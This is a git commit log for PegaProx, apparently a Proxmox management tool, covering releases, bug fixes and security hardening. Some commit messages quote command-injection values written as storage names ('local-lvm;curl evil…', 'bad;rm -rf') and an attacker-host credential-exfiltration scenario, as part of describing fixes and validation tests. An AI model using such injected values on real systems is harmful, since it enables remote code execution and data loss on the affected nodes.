70 Commits

Author SHA1 Message Date
MrMasterbay
7ba2a54c5f release: PegaProx 1.0.1
Bump PEGAPROX_VERSION + PEGAPROX_BUILD (constants.py, constants.js) and
version.json (version / build / release_date) to 1.0.1 / 2026.08.09, and add
the 1.0.1 changelog entry.

version.json update_files audited for completeness: all shipped application
files (pegaprox/, web/ output, plugins/, static/, images/, misc/, docs/,
examples/, root) are listed; nothing new since 1.0 needs adding — the only
files added on this branch are a CI workflow and tests, both intentionally
not part of update_files.
2026-08-09 21:30:30 +02:00
mkellermann97
64fa9c0f11 release: complete the 1.0 update manifest
The auto-updater pulls exactly the files listed in version.json update_files,
and several shipped modules had never been added to it, so an in-place update
would skip them: pegaprox/api/multi_sdn.py (#612 EVPN), core/bmc.py, core/redfish.py,
core/incremental_repl.py, utils/ssh_security.py and utils/vnc_grab.py, plus the
netzware/technidata/linet sponsor logos the README references. All six modules are
imported by the running app; without them a fresh update lands a broken tree.
Verified every tracked pegaprox/**, plugins/** and referenced image is now covered
(the only omissions left are deliberate: the unused occentus-badge.svg and the
plugins/.gitkeep placeholder). 245 files now.
2026-08-01 10:33:21 +02:00
MrMasterbay
56190d1437 release: bump version to 1.0
- constants.py + web/src/constants.js: PEGAPROX_VERSION "Beta 0.9.15" -> "1.0", build 2026.08.01 (drops the Beta prefix)
- version.json: 1.0 manifest + changelog; 0.9.15 moved to prev_changelog
- web/index.html rebuilt from src

Caps the post-0.9.15 line for the 1.0 milestone. FF Testing -> main + tag is the
release step.
2026-08-01 00:36:07 +02:00
MrMasterbay
e8684a00af release: v0.9.15 — security hardening, Cloud parity, temperature monitoring
Bumps PEGAPROX_VERSION -> Beta 0.9.15 (constants.py + web/src/constants.js),
the README badge, and version.json (build 2026.07.14 + changelog). Bundles all
Testing commits since v0.9.14.1: the CodeAnt/pentest security-hardening sweep
(BOLA/IDOR tenant gates, SSRF/RCE/CSRF guards, CWE-117, dependency CVE bumps,
AGPL §7(b) attribution), full Cloud-layout feature parity, temperature history
+ alerting (#601), sidebar/scale perf, the integration+authz test harness, and
community PR #617 (snapshot-name validation, @MatrixNeoKozak). Welcomes
TechniData AG Limited as a Silver sponsor.
2026-07-14 00:08:34 +02:00
mkellermann97
36506410b7 chore(release): bump to Beta 0.9.14.1 (build 2026.07.10)
#598 aio-selector, #611 maintenance RAM pre-warning, #556 portal self-service
teardown, #607 EFI-storage fallback, #614 behind-proxy log noise + console URLs,
dependency-floor security bumps (crypto/fido2/pillow/setuptools/requests) +
Site-Recovery CWE-117, and Occentus Network as a new Platinum sponsor.
2026-07-10 20:42:46 +02:00
MrMasterbay
63618e3ea8 sponsors: add Occentus Network as a Platinum sponsor
Occentus Network (occentus.net) came on board as Platinum. Wired sponsor slot
5 (ui.js) + README Platinum section + version.json manifest. Logo rendered from
their official Occentus-Network.svg: white wordmark for the dark in-app sponsor
card (sponsor5.png), Occentus-green #009045 recolour for the README so it stays
visible on light + dark GitHub themes (occentus.png).
2026-07-10 20:13:00 +02:00
MrMasterbay
3e01ecdc8d chore(release): bump to Beta 0.9.14 (build 2026.07.05)
Version bump across constants.py / constants.js / version.json (+ changelog) /
README badge / rebuilt web bundle. Ships the 27-commit Testing batch since
0.9.13.3: StarWind starlvm storage + one-click plugin install, ProxLB VM-tag
placement (#426), Extra CPU Flags (#410), Site-Recovery test-failover NIC
isolation + planned/failback pre-flight (#413), portal self-service CT (#556),
Ceph Prometheus metrics (#540), French DR/RGS compliance, V2P wizard SSH-user
(#602) + VLAN tag (#598), LXC OS/IP (#560), plus fixes, a PBS backup-status BOLA
fix and a batch of WebUI performance work.
2026-07-05 15:51:11 +02:00
MrMasterbay
39d41ba3ce chore(release): bump to Beta 0.9.13.3
Snapshot schedules (#586) + replication overview tab (#430) + a stack of
bug-fixes (#594/#597/#592/#555/#590/#585/#584/#583/#580/#587) and the CIS
hardening log-bounds (#595). Tag/release after the #595 on-node smoke test.
2026-06-30 22:59:37 +02:00
MrMasterbay
d1b83a5b64 chore(release): bump to Beta 0.9.13.2
Rolls up the security-audit hardening (API-token object-level scoping,
object-level authz gaps in restore/console/migration/snapshot, tenant
isolation + role hierarchy in user/role admin, per-action perms on schedules).
2026-06-24 00:37:43 +02:00
MrMasterbay
7af2ff1660 release: bump to Beta 0.9.13.1
Point release rolling up everything on Testing since 0.9.13: replication
per-NIC bridge map (#532) + pinned target VMID & delete-target (#552), the
fix-args migration warning (#424), and the security hardening from the two
adversarial reviews (replication endpoint authz + the prior-feature pass:
tenant chargeback/quota BOLA, pool/VM-ACL cluster-reach priv-esc, portal
console pve_port validation, tag-endpoint scoping).

- constants.py / constants.js -> Beta 0.9.13.1 (build 2026.06.18)
- version.json + README badge
- rebuilt web/index.html
2026-06-18 00:03:42 +02:00
MrMasterbay
480f1e62e3 sponsors: add Netzware (Platinum) to the in-app sponsor strip
Netzware was in the README sponsor list but not wired into the in-app SponsorSlot
strip (slots 1-3 were socialfurr/netwolk/Expertize; 4-8 empty). Added it as slot 4
→ https://netzware.at/, using the square [z] icon they supplied for in-app use
(the 500x109 README banner doesn't fit the 48px square slot). Asset placed as
images/sponsors/sponsor4.png (+ netzware-icon.png as the named source, like
sponsor3-icon), both added to version.json update_files so installs get them.

Verified live: /images/sponsors/sponsor4.png serves 200 and the slot renders.
2026-06-17 21:02:17 +02:00
MrMasterbay
8bdc959cb8 branding: favicon from the light PegaProx (Pegasus) logo
Swapped the favicon to our light square logo (the dark-blue Pegasus on transparent,
images/pegaprox-logo-square-light.png). Regenerated all referenced sizes from the
3000px source with LANCZOS: favicon.ico (16/32/48), favicon-16x16.png,
favicon-32x32.png, apple-touch-icon.png (180). The PNG variants index.html links to
were missing before (only favicon.ico existed) — they're created now, so no more
404 on those + the icon renders crisp on light tabs.

Added the three new PNGs to version.json update_files so existing installs get them
via the updater (the sponsor-asset-missing trap).
2026-06-17 20:53:12 +02:00
Nico Schmidt
68ce9b0e4e release: v0.9.13 version bump (constants + version.json + README + rebuilt index.html)
Completes c74a1ca (which only carried the dashboard.js.bak removal — the version
files were dropped by an atomic git-add pathspec failure). Version 0.9.13 / build
2026.06.12; version.json changelog + cloud.js in update_files; web/index.html rebuilt.
2026-06-12 00:21:07 +02:00
mkellermann97
fbeba491e7 release: bump to v0.9.12.3
- in-app updater + update.sh always re-download the full tree now (no version-skip
  early-exit) so partial/stale installs self-heal — 8a021c1 / 20fe5c1 / 5358500
- fix self-signed cert generation on fresh Docker containers (ccdb7b1): create the
  config/ssl dir before writing, so HTTPS login works on :latest instead of falling
  back to plain HTTP
- add images/sponsors/datimo.png to version.json update_files so older updaters
  pull the new sponsor logo too
2026-06-08 10:30:43 +02:00
Nico Schmidt
aac22eff3a release: bump to v0.9.12.2 (build 2026.06.05)
Version bump across all sources (constants.py, web/src/constants.js, version.json,
README badge, recompiled web/index.html) — backend == frontend verified.

Rolls up this cycle's work: full pentest remediation (CRITICAL C-1 console PVE
ticket leak, C-2/M-2 V2P root cmd-injection; HIGH console BOLA, API-token scope,
push-SSRF, plaintext-backup shred, chunked-body OOM) + mediums (M-3 group tenant
isolation + xclb BOLA, M-7 webhook SSRF, M-8/M-9 ACME/SIEM/site-recovery SSRF;
OIDC deliberately untouched), Corporate Layout UI polish, and CI changes
(Docker-on-release-tag, 150 apt-poll retries, LXC :latest asset).

Verified: version.json valid + all 48 changed app files already present in
update_files (0 missing); clean boot; /api/health reports 'Beta 0.9.12.2';
login + core endpoints 200; live SSE streaming.
2026-06-05 13:57:12 +02:00
mkellermann97
41a007f758 release: v0.9.12.1 — PBS host-validator hotfix
Fixes #514 (jostrasser). The placeholder-allowlist fix in 5353eb9
needs a release cut so Docker :latest + the in-app updater pick
it up. Version bumped across constants.py / constants.js /
version.json / README badge / web/index.html (rebuilt).

No other content changes — surgical hotfix from v0.9.12.0.
2026-05-31 22:28:12 +02:00
Nico Schmidt
403a04935c
release: v0.9.12.0 — monitoring expansion + perf + security hardening (#513)
* docs(readme): add Plugins link to nav (plugins.pegaprox.com)

* fix(xcrepl): race condition (#455) + identity preservation (#456)

#455 (race condition):
- Scheduler now tracks in-flight job IDs (set + lock in cross_cluster_replication.py)
- Skip the tick when previous run still executing — was killing it via "stale replica" cleanup
- Manual trigger endpoint returns 409 Conflict instead of spawning a duplicate thread
- Thread wrapper releases the slot on completion (or failure)

#456 (identity preservation):
- Capture source hostname (LXC) / name (QEMU) + per-NIC MAC BEFORE the clone
  overwrites them — was leaking the temp xcrepl-{vmid}-tmp label to the replica
- Restore both on the target after remote-migrate completes
- MAC swap preserves bridge / VLAN-tag / rate / firewall tokens — only the
  MAC token is replaced, everything else inherits from migration
- Supports LXC (hwaddr=) and QEMU (virtio= / e1000= / vmxnet3 / etc.) NIC formats
- Best-effort — replication doesn't fail if identity restore trips
- Architectural-question (vzdump + pct restore --unique 0) parked for later
  discussion — surgical fix unblocks DR users today

* fix(#413): xcrepl safety gate — never delete unrelated VMs on target

Reported by @blackshocks. Earlier xcrepl flow deleted any VM on the target
that happened to share the source VMID, on the assumption that the VMID
collision had to be a previous run of this same job. Real-world scenario:
freshly paired clusters where the target already held an unrelated VM at
the matching VMID. The delete destroyed user data.

Replicas are now tagged on successful migration with two markers:
  - `pegaprox-replica` (general)
  - `xcrepl-job-<job_id>` (job-specific)

The safety gate before the delete checks for the job-specific tag and
refuses to proceed if it's missing — so an unrelated VM at the matching
VMID stays put and the run errors out cleanly with an actionable message
telling the operator how to recover (tag the stranded replica manually
or pick a different target VMID).

Cross-job protection: two unrelated xcrepl jobs colliding on the same
target VMID can't nuke each other's replicas, the job-specific tag has
to match.

Existing replicas from pre-v0.9.12 runs are NOT tagged — operators
either tag them manually (error message tells them how) or accept one
failed run + manual cleanup before the new run creates a fresh, tagged
replica.

Verified against real PegaProx instance + real LXC 107 (untagged) +
synthetic configs covering all 6 gate paths.

* fix(#451): login input text invisible in Modern UI corporateLight theme

Reported by @thefiredragon. Modern UI's `corporateLight` theme sets
`body.light-theme` while Corporate Layout's light mode sets
`data-corp-theme="light"` — two separate gating attributes. The existing
text-white override (line 1184) only catches the corp-layout path, so
the Modern UI's near-white (#fafafa) background was rendering the
white-text login inputs as invisible typed text.

Surgical fix: add `body.light-theme input.text-white` +
`body.light-theme textarea.text-white` overrides so input/textarea
text becomes dark-grey on the light bg. Scoped to input/textarea only
so the orange submit-button's intentional `text-white` stays white.

Verified by curl-ing the served `/` from local PegaProx — rule lands in
the rendered HTML, single selector count. Browser hard-reload picks it
up immediately (CSS-only, no server restart needed).

* fix(#438): v2p sshfs+drive_mirror live-pivot wasn't updating persistent config

Reported by @crcro. Three rounds of support-bundles eventually pinned this:

In `_do_sshfs_boot_migration` (v2p.py around line 4977), the `drive_mirror -n`
live-pivot updates QEMU's runtime view of the disk to the local target but
does NOT update the persistent VM config (`/etc/pve/qemu-server/<vmid>.conf`).
The attach-disks block (`qm set --scsi0=<vol_id>`, boot order, etc.) was gated
behind `if not mirror_success:` — so when the live-pivot DID succeed, none of
the persistent config update ran. Symptom: VM works post-migration as long as
QEMU stays running, then any reboot finds no disk in config and won't boot.
The .raw / .qcow2 files end up orphaned on storage with no VM referencing them.

Reporter's bundle (post-completion run, 2026-05-27) showed the full trace:

  [V2P:0911ff8e] === ALL DISKS MIGRATED TO LOCAL STORAGE (live pivot) ===
  [V2P:0911ff8e] Configuring VM with local disks...
  ...
  Final VM config:
    agent: enabled=1
    bios: seabios
    [... 14 more lines ...]
    sockets: 1
    vga: vmware
  # ← no scsi0 / virtio0 / boot anywhere

Fix: add the persistent-config update inside the mirror_success branch too.
Cleans stale args/boot/unused/old-scsi sshfs references, then writes
`scsi0=<local-vol-id>` for each migrated disk and sets boot order. VM keeps
running off the in-memory pivoted disk, but the config now also reflects it
so reboots survive.

EFI / sector-size / VM-start steps stay only in the not-mirror-success path
since those are creation-time concerns that were already handled at VM
creation in the mirror-success flow.

E2E verify limitation: no vSphere source available in the local dev env,
so this is code-review + static-check + log-flow-trace verified, not a
live re-run of a v2p migration. Next migration on @crcro's side validates.

* feat(audit): emit terminal-phase events for migration + replication paths

v0.9.12-prep. Discovered while debugging #438 + #413 across three days of
support-bundle round-trips: vmware/xhm/xcrepl async paths only audit the
.started event, never .completed/.failed. That forces every silent-failure
investigation into log archaeology with the journalctl-permission-block dance
each time, instead of just reading the audit log.

Three central hook-points cover ~150 individual exit points:
  - V2PMigrationTask.set_phase (v2p.py:138)
  - XHMigrationTask.set_phase (xhm.py:178)
  - _update_repl_status (vms.py:_update_repl_status)

Each now emits a terminal audit event on `completed` or `failed` with the
relevant identity (VM name + target VMID for v2p, direction + source/target
cluster+node for xhm, job_id for xcrepl) and the failure reason on `failed`.
All wrapped in try/except so a broken audit write can't tank the task.

Audit-action namespace:
  - vmware.migration.{completed,failed}  ← matches existing .started
  - xhm.migration.{completed,failed}
  - replication.{completed,failed}       ← matches existing .triggered

E2E verified against running pegaprox: instantiated V2PMigrationTask in a
python process, called set_phase('failed', 'unit-test simulated error'),
confirmed audit_log row landed in DB with the right action + detail. Test
entry then deleted.

Next #438 bundle should show the failure-reason in audit_log directly. Same
for #413 once the failover thread hits a terminal phase. Saves the
log-window-vs-audit-event timing game on every future bundle.

* fix(security): Added cluster-scoped authorization validation to prevent unauthorized cluster deletion via check_cluster_access() in the DELETE endpoint. (#459)

Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com>

* fix(security): Added VM-specific authorization validation to prevent unauthorized disk manipulation during storage migration operations. (#460)

Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com>

* fix(security): Fixed cross-tenant RBAC bypass vulnerability in custom role CRUD operations by adding tenant-scoped authorization validation. (#470)

Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com>

* fix(security): Fixed authorization bypass vulnerability by validating scheduled task actions to prevent privilege escalation from vm.start to node.update permissions. (#461)

Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com>

* fix(security): Fixed heredoc terminator injection vulnerabilities in hosts, DNS, and certificate management by using UUID-based dynamic delimiters instead of fixed heredoc terminators. (#468)

Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com>

* fix(security): Added cluster-scoped authorization validation to HA management endpoints to prevent unauthorized access to clusters outside user scope. (#467)

Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com>

* fix(security): Added object-level authorization to PBS API endpoints to enforce cluster-based access control and prevent unauthorized cross-server operations. (#476)

Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com>

* fix(security): Added cluster-level access control checks to all 15 plan-specific site recovery API endpoints to enforce authorization for both source and target clusters. (#474)

Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com>

* fix(security): Fixed authorization bypass vulnerability in VMware VM operations by adding VM-level access control checks across all destructive endpoints. (#478)

Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com>

* fix(security): Added cluster-level and VM-level access control validation to cross-hypervisor migration planning and execution endpoints to prevent unauthorized VM migrations. (#463)

Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com>

* fix(security): Fixed unauthorized console ticket minting vulnerability by validating VM existence on target vCenter before issuing credentials. (#462)

Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com>

* fix(security): Fixed Server-Side Request Forgery (SSRF) vulnerability by implementing PBS host validation and allowlisting in pegaprox/core/pbs.py and pegaprox/api/pbs.py. (#475)

Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com>

* fix(security): Fixed CSV formula injection vulnerability in audit log exports by sanitizing fields to neutralize spreadsheet formula-triggering characters. (#483)

Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com>

* fix(security): command injection prevention via storage-name validation + shlex.quote (#481 port)

Manual port of closed Aikido autofix #481 (closed-superseded by mistake during
the batch-merge sweep — re-review showed it had unique, critical coverage that
no other PR replaced).

What was actually exposed: `storage` / `target_storage` params land in
`pvesm path` / `pvesm alloc` / `pvesm status` shell commands on the PVE node
across 7+ call sites. A user with cluster.config + storage-list access (e.g.
storage-balancer role) could craft a storage name like `local-lvm;curl evil…`
and execute arbitrary shell on the node — straight RCE class.

Defence in two layers:

1. New `validate_storage_name()` helper in utils/sanitization.py — regex-locks
   to `^[a-zA-Z0-9][a-zA-Z0-9_\-\.]{0,99}$`. Called at the api boundary in
   `iso_sync_trigger`, `start_vmware_migration`, `xhm_start` before the
   request ever reaches the worker thread.

2. `shlex.quote()` wraps at every pvesm shell-cmd construction site
   (defence-in-depth, also catches names that bypassed the api gate via DB
   direct-write / migration-from-pre-fix-saved-state):
   - core/manager.py:11280  `pvesm path {storage}:...`
   - core/v2p.py:656         `pvesm path {target_storage}:1`
   - core/v2p.py:3277        `pvesm alloc {target_storage}`
   - core/v2p.py:5434        `pvesm status --storage {target_storage}`
   - core/xhm.py:717,1811,1861  three `pvesm alloc {target_storage}` cmds
   - core/v2p.py:1681 already had shlex.quote (kept)

Added `import shlex` to xhm.py (was missing).

Smoke-tested: imports OK, validate_storage_name accepts legit storage names
(local-lvm, tgt01-nfs-hdd, good.storage_1) and rejects injection attempts
(`bad;rm -rf`, empty).

* fix(security): credential-exfil guard on PBS + VMware host changes (#469 port)

Manual port of closed Aikido autofix #469 (closed-superseded by mistake during
the batch sweep — re-review showed it addresses a different vuln class than #476
which I cited; ported manually).

Vulnerability: when updating a PBS or VMware server entry, the UI lets you keep
the saved credentials by sending password/api_token_secret/ssh_key as `********`.
PegaProx replaces the masked value with the real stored credential and then calls
`mgr.connect()`. If the user ALSO changed the host/port in the same edit, that
real credential gets sent to the new host — potentially attacker-controlled
(social-engineering-driven cred-exfil; admin gets tricked into pointing the
server at evil-server.example).

Fix: detect `host_changed AND credentials_preserved` at the same time → set the
manager to `connected=False` with a clear `last_error` instead of auto-connecting.
Operator must explicitly use Test Connection after verifying the new host. The
non-suspicious code paths (host unchanged, OR fresh credentials supplied) keep
auto-connecting as before.

Both update endpoints get the guard:
- `update_pbs_server` (api/pbs.py)
- `update_vmware_server` (api/vmware.py)

vmware.py was missing `import logging` for the warning line — added.

* fix(security): VM-level ACL gate on site-recovery add_plan_vm (#477 port)

Manual port of closed Aikido autofix #477 (closed-superseded by mistake — re-review
showed it had VM-level granular coverage that #474 did not).

#474 (already merged) added cluster-level `check_cluster_access` on all 15 plan
endpoints, which is the necessary baseline. But cluster-level access alone is
not sufficient on `add_plan_vm`: a user with cluster-view permission but no
ACL for a specific VM could otherwise add that VM to a recovery plan, then
trigger a Test Failover or Planned Failover and act on a VM they shouldn't
touch. The cluster-gate would pass each time because the plan IS on a cluster
the user can see.

Fix: in add_plan_vm, after the cluster-access gate, also check
`user_can_access_vm(user, plan['source_cluster'], vmid, 'vm.view', vm_type)`.
Returns 403 if denied. The other plan endpoints (delete_plan_vm, etc.) don't
need this — they operate on already-added rows that went through this gate.

* fix(security): cluster-scoped auth on PBS backup-verification endpoints (#465 port)

Manual port of closed Aikido autofix #465 (closed-superseded by mistake — #476
which I cited covered the `/api/pbs/<pbs_id>/*` endpoints via `check_pbs_access`
but did NOT touch the `/api/clusters/<cluster_id>/backup-verify*` endpoints
which use a completely different auth-key. They went un-protected after that
merge — the gap was unintentional on my side, not Aikido's).

Three endpoints get a `check_cluster_access(cluster_id)` gate after the
existing `@require_auth(perms=['vm.backup'])` decorator:

- `POST   /api/clusters/<cluster_id>/backup-verify`         start_backup_verification
- `GET    /api/clusters/<cluster_id>/backup-verify/<task>`  get_backup_verification_status
- `GET    /api/clusters/<cluster_id>/backup-verify/history` get_backup_verification_history

Pattern matches the existing cluster-access checks across the codebase. No
behavioral change for users with proper cluster ACL; 403 for cross-cluster
attempts.

* fix(#484): preserve maintenance flag on offline nodes + SSE heartbeat every tick

Two bugs reported in #484, both surface when a node in HA maintenance
gets rebooted:

* manager.get_node_status() offline branch — when status_data is None
  (node mid-reboot, or circuit breaker open) the per-node dict was built
  without 'maintenance_mode'/'maintenance_task'/'maintenance_acknowledged'.
  Sidebar reads metrics.maintenance_mode → undefined → renders '(Offline)'
  with no maintenance indicator, even though nodes_in_maintenance still
  has the entry and PVE still has the HA flag set. Same fix applied to
  the ha_node_status fallback below it (covers full /nodes drop-out).

* broadcast loop — heartbeat was gated on `loop_count % 5 == 0`. With a
  dead node the per-cluster fan-out walls on the 8s thread-join cap each
  cycle, so heartbeat drifts out to ~40s between beats. Frontend's wedge
  threshold is 30s → SSE flapping in reconnect loop. Send heartbeat
  every iteration instead, one tiny message per second is nothing.

Verified locally with the dev instance + an in-process probe that hits
the offline branch directly. Customer should retest the reboot path on
Testing build.

* fix(#413): SR background task no longer crashes on broadcast_sse + tolerate PVE 9.x SDN list payload

Two issues surfaced in @blackshocks's journalctl bundle:

* `[SR] Background task crashed for plan ...: broadcast_sse() missing 1
  required positional argument: 'data'` — `_broadcast_progress()` was
  invoking `broadcast_sse({...})` with a single dict, but the helper
  signature is `(update_type, data, cluster_id=None)`. Every progress
  emit in the failover path therefore killed the worker, which is why
  Test/Planned/Emergency Failover all show as "running" forever in the
  UI without an outcome event landing. Split the call into the proper
  `('site_recovery', {...})` form. Same broken pattern was also in
  `core/xcpng.py:1673,1680` (XCP-NG task-poll loop) — fixed alongside.

* `SDN availability check failed: 'list' object has no attribute 'get'`
  — PVE 9.x returns `/cluster/sdn` as a list of available SDN endpoints
  (zones, vnets, ipams, …). Older clusters returned a dict carrying a
  digest. The code unconditionally called `.get('digest')` on it. Added
  an isinstance guard so the digest is read only when PVE actually
  exposes a dict; list payloads are accepted silently.

Reported by @blackshocks via #413 debug bundle.

Verified by isolated REPL probe: `_broadcast_progress('test', 'msg', 42)`
runs clean post-fix where it previously raised TypeError. SDN guard is a
defensive isinstance check, no live trigger needed.

* fix(#413): Proxmox-target SR test failover couldn't find any VM (missing get_vms shim)

After the broadcast_sse signature fix this morning (fc77cd5) the SR
worker no longer crashes — so the test failover actually runs to
completion. @blackshocks's screenshot is now hitting the next layer:
"VM not found on target" for every VM in the plan.

Root cause: `execute_test_failover` / `_migrate_vm` in
`pegaprox/background/site_recovery.py` resolve VMs on the target via
`mgr.get_vms(node_name) if hasattr(mgr, 'get_vms') else []`. The method
exists on `vmware.py` / `xcpng.py` / `esxi_cluster.py` but not on the
main Proxmox manager — that one exposes `get_vm_resources()` instead.
So for a Proxmox→Proxmox plan the `hasattr` check returned False and
the lookup silently fell back to an empty list, producing "VM not
found on target" for every VM, every time.

Fix: add a uniform `get_vms(node=None)` shim on `PegaProxManager` that
proxies to `get_vm_resources()` and optionally filters to one node.
Same list shape as the other managers; no SR-side changes required.

Reported by @blackshocks via #413 (post-fix retest).

Verified via isolated REPL probe — FakeMgr backed by the existing SR
detection loop now resolves VMIDs by node correctly.

* fix(#413): SR detection — target_vmid awareness + null-tgt guard + sweep logging

@blackshocks's bundle (20260528_113247) shows the test failover ran to
completion after a9c0045 but still reported "VM not found on target".
The recent_tasks confirm xcrepl had just rebuilt VM 103 on the target
node ~28s before the SR test fired, so the lookup *should* have hit —
but with zero log output from the SR detection sweep we can't tell from
the bundle whether get_node_status() came back empty, whether the
get_vms shim returned an empty list, or whether the vmid match itself
failed. Symptom only, no signal.

Three changes to close that gap:

* Honour `site_recovery_vms.target_vmid` when set (column exists in the
  schema but was never read). Falls back to the source vmid for the
  common case where PVE qmigrate / our xcrepl preserve the ID.

* Guard against `tgt_mgr is None` up front. Was relying on the outer
  `except Exception` catching the AttributeError, which masked the
  cluster-disconnected case behind a generic "VM not found".

* `logger.info` the sweep at three points: which VMID we're looking for
  and which nodes we'll probe, per-node VM list count + vmids, and the
  miss line if detection ends empty. Next bundle should tell us in one
  glance what PegaProx actually saw.

Reported by @blackshocks via #413 (third bundle).

No E2E here — restart denied + no SR plan configured in dev env. The
logging additions are pure observability, no behaviour change for the
happy path; target_vmid fallback only kicks in when the column is
populated (currently never via UI/API).

* fix(security): aikido findings — SSL outlier + docker.yml job-scoped perms

Two real fixable items from the latest Aikido scan (aikido_issues(3).csv,
2026-05-27 batch). Other findings triaged but not changed:

* `pegaprox/core/manager.py:7932` was the lone `self.session.post(..., verify=False)`
  call in the file — every other PVE-API call routes through `_create_session()`
  which already honours per-cluster `self._ssl_verify`. For the default
  self-signed-PVE-cert user (`_ssl_verify=False`, set on init) behaviour is
  identical — the helper still produces `session.verify=False`. The only
  behaviour change is for operators who explicitly opted into
  `ssl_verification=True` on a cluster (i.e. they pinned a custom CA) —
  that one outlier call was the only place still bypassing their choice.
  REPL-probe verified both directions resolve to the expected verify value.

* `.github/workflows/docker.yml:14` had `packages: write` at the workflow
  top-level so any future job we add silently inherits the GHCR write
  capability. Moved to job-scoped `permissions:` on `build-and-push` so
  the cap is granted only to the job that actually pushes.

Triaged-no-change (false positives or out-of-scope):
- `plugins/status_page/status.html:299` — the setHTMLSafe() wrapper uses a
  *detached* `<template>.innerHTML` then `_stripDangerousNodes()` before
  adopting via replaceChildren. Aikido pattern-matched innerHTML; the
  surrounding sanitiser is the documented defence-in-depth shape.
- `web/index.html:{1618,3758,21125}` and the five `-----BEGIN ... KEY-----`
  hits — every match is a textarea **placeholder** showing users what
  format to paste their key/cert in. Decoded the suspicious base64 on
  line 4979: `b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAA=` is literally just the
  OpenSSH magic header + "none" cipher field, zero key material.
- `pegaprox/core/manager.py:{5527,5797,5864,5925,5941}` path-traversal —
  paths are `os.path.join(heartbeat_dir, f'<prefix>_{node}')` where node
  comes from PVE's `/api2/json/nodes`, server-controlled. Compromise of
  PVE makes path traversal of HA log files the least of our worries.
  Could add a `validate_hostname()` gate as defence-in-depth — left as
  a Nico-decision since it's 5 callsites with no demonstrated threat.
- `ssl/acme_account.key` — file is `.gitignore`d (`ssl/*.key` rule) and
  `pegaprox/core/acme.py:_load_or_create_account_key` auto-generates a
  fresh key on install. But the file WAS committed in `f8c12d5` (v0.9.4
  release Mar 2026), so the key is still in git history. Repo-history
  scrub on main is a force-push-class operation — flagged for Nico.

Verified via isolated REPL probe of `_create_session()` for both
`_ssl_verify` modes. The docker.yml change is metadata-only, no functional
impact on PegaProx itself.

* fix(security): kill first-run hardcoded-creds takeover — setup wizard replaces default pegaprox/admin

Aikido AI-pentest finding (real, not a false positive). On every fresh
install `load_users()` auto-bootstrapped `pegaprox` / `admin` with
ROLE_ADMIN before the operator even saw the UI. Any network attacker
who could reach the port before setup-completion could log in with the
publicly-documented credentials, and the `force_password_change=True`
flag was advisory-only — the session was issued anyway and every
ROLE_ADMIN-gated route accepted it. First-run remote admin takeover.

Replaces the auto-bootstrap with an explicit setup wizard:

* `utils/auth.py`
  - `load_users()` no longer creates a default admin when none exists.
    Returns empty dict for uninitialised installs. Callers must check
    `is_initialized()` separately.
  - New `is_initialized()` — returns True if `ADMIN_INITIALIZED_FILE`
    exists OR users are already in the DB (handles upgrade from
    pre-setup-wizard builds).
  - New `backfill_initialized_marker()` — stamps the marker on startup
    for pre-existing users so upgrade is transparent.
  - `create_default_users()` removed. New `create_initial_admin(
    username, password, display_name, email)` shapes the dict from
    setup-wizard input.

* `api/auth.py`
  - `/api/auth/login`: returns `503 NOT_INITIALIZED` before any
    credential check when setup hasn't run. No more "is the default
    password set?" guessing for attackers.
  - New `/api/auth/setup` (unauth, since there is no session yet):
    accepts the operator's chosen username + password + optional
    display_name + email, validates the password policy, refuses the
    reserved name `pegaprox`, creates the first admin, marks the
    install as initialised. Replay returns `409 ALREADY_INITIALIZED`.
    Even if the marker file is deleted on-disk, the DB-second-opinion
    inside `is_initialized()` prevents a hijacker from racing setup
    against the existing admin's user record. Per-IP rate-limit
    (5/60s) is hygiene against username/password fuzzing.
  - `/api/auth/check` now surfaces `initialized: bool` in the 401
    body so the frontend knows when to render the wizard.

* `app.py`
  - Removed the "DEFAULT LOGIN CREDENTIALS" startup banner that
    literally printed `pegaprox/admin` to stdout.
  - Calls `backfill_initialized_marker()` once at startup.
  - Prints a `FIRST-RUN SETUP REQUIRED` banner only when uninitialised.
  - `/api/auth/setup` added to the CSRF-exempt list (unauth flow,
    same as `/api/auth/login`).

* Frontend
  - `contexts.js`: `AuthProvider` reads `initialized` from /auth/check
    response and exposes a `needsSetup` flag.
  - `dashboard.js`: render `<SetupWizard />` instead of `<LoginScreen />`
    when `needsSetup && !user`.
  - `auth.js`: new `SetupWizard` component — branded landing page,
    username + password + confirm-password + optional display_name +
    optional email, client-side validation mirrors server, POSTs to
    `/api/auth/setup`, success → reload so AuthProvider re-checks.
  - Frontend rebuilt (`web/index.html`).

Migration:
  Existing installs are untouched. On first boot of this build,
  `backfill_initialized_marker()` stamps ADMIN_INITIALIZED_FILE if
  any user exists in the DB, so login keeps working.

E2E (Flask test_client + temp config dir, no live server needed):
  Stage 1  fresh install: is_initialized=False, no users
  Stage 2  backfill upgrade: marker written for existing users
  Stage 3  full wipe back to fresh
  Stage 4  pre-setup login → 503 NOT_INITIALIZED
  Stage 5  /auth/check pre-setup → initialized=false
  Stage 6  weak password rejected (policy: 8+ chars, upper/lower/digit)
  Stage 7  reserved username `pegaprox` rejected
  Stage 8  setup happy path creates admin + marks initialised
  Stage 9  replay rejected (409 ALREADY_INITIALIZED)
  Stage 10 new admin can log in
  Stage 11 old hardcoded pegaprox/admin no longer works (401)
  Stage 12 marker-deletion attack blocked by DB second-opinion
  Plus isolated probe: 6th setup attempt within 60s → 429

* feature: Add DNS-01 challenge support for certificate requests

Fixes: #420
Sponsored-by: credativ GmbH <https://credativ.de>

